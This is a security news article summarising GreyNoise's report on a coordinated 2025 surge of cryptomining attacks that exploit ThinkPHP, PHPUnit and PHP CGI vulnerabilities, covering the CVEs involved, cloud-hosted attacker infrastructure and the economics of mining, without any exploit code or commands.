Coordinated Cryptojacking Blitz: Hackers Exploit ThinkPHP and PHP RCE Flaws to Maximize Mining Profit

Analysts at GreyNoise Intelligence have reported a sharp, coordinated surge in attacks exploiting vulnerabilities across PHP and its frameworks—including ThinkPHP, PHPUnit, and the recently disclosed CVE-2024-4577—as cybercriminals rush to deploy cryptominers ahead of what they call a “high-profit window” driven by soaring cryptocurrency prices.

According to GreyNoise’s latest network telemetry, “From August through October 2025, we observed a clear ramp-up in exploitation attempts against PHP and PHP-based frameworks as actors push to deploy cryptominers.” The team’s sensors recorded seven distinct attack patterns running in parallel, “steady in August–September, then spiking into October and November.”

The most active campaigns exploit ThinkPHP Framework LFI (CVE-2022-47945), PHP CGI (CVE-2012-1823), and PHP CVE-2024-4577, all showing steep growth curves since late Q3 2025. Even legacy exploits like ThinkPHP Code Execution (CVE-2019-9082) and PHPUnit RCE continue to register 50–150 attack attempts per day, indicating that “older chains still produce meaningful volume.”

GreyNoise’s network graph suggests a deeper connection between these campaigns: “The network graph implies these campaigns aren’t independent—they share infrastructure and tools, pointing to coordination or communal tooling.”

The report highlights how cloud service providers dominate the attacker landscape.

“Cloud providers constitute the majority of attacking IPs. Top offenders by IP count include Cloudflare (1,000 IPs), DigitalOcean (688), Google (536), and Contabo (512),” the researchers wrote, noting that “the top 21 organizations account for about one-third of all attacking IPs—a mix of compromised customer VMs, misconfigured services, and rented infrastructure used for mining at scale.”

Geographically, attacks are truly global—with hosts traced to Germany (Contabo, Hetzner), Taiwan, China (Volcano Engine, Huawei, Alibaba), and North America. The analysts conclude: “Attackers are simply using whatever compute they can either rent or compromise.”

The timing of the campaigns aligns with renewed profitability in the crypto market. GreyNoise links the attack wave to Bitcoin’s price surge above $110,000 and the global market cap topping $3.71 trillion.

The report positions cryptomining as a “commodity crime” rather than a niche tactic:

“Cryptomining is attractive because its economics favor stealth and scale. Unlike ransomware, which requires victims and payment infrastructure, mining converts compute to coin with minimal friction.”

Throughout 2025, cloud cryptojacking activity rose roughly 20%, confirming that threat actors are industrializing the practice. “The playbook is straightforward: scan, compromise, deploy a miner (binary, Docker image, or script), and funnel rewards to mining pools controlled by the attackers,” GreyNoise says. “Victims pick up the electricity and infrastructure cost while attackers collect the proceeds.”

Automation plays a key role. With pre-built exploit kits and miner templates widely available, a single automated exploit chain can compromise hundreds of identical targets across the internet. “Often, a successful chain of automated steps—probe, exploit, payload fetch, execute—is all that’s needed to get mining capacity online,” the report notes.

PHP remains an enduring target because it powers the majority of the modern web.With PHP driving roughly 75% of all websites, attackers benefit from a near-limitless attack surface. The exploited vulnerabilities span over a decade (2012–2024), which “highlights a core problem: old vulnerabilities don’t go away just because they’re old.”

If Bitcoin’s historical November trend holds, the compromised servers will deliver outsized returns. “If November follows historical patterns and prices climb materially, deployed miners will earn significantly more than they would have months earlier,” the report concludes.

Rate this post

Related Posts:

Found this helpful?

Leave a Reply Cancel reply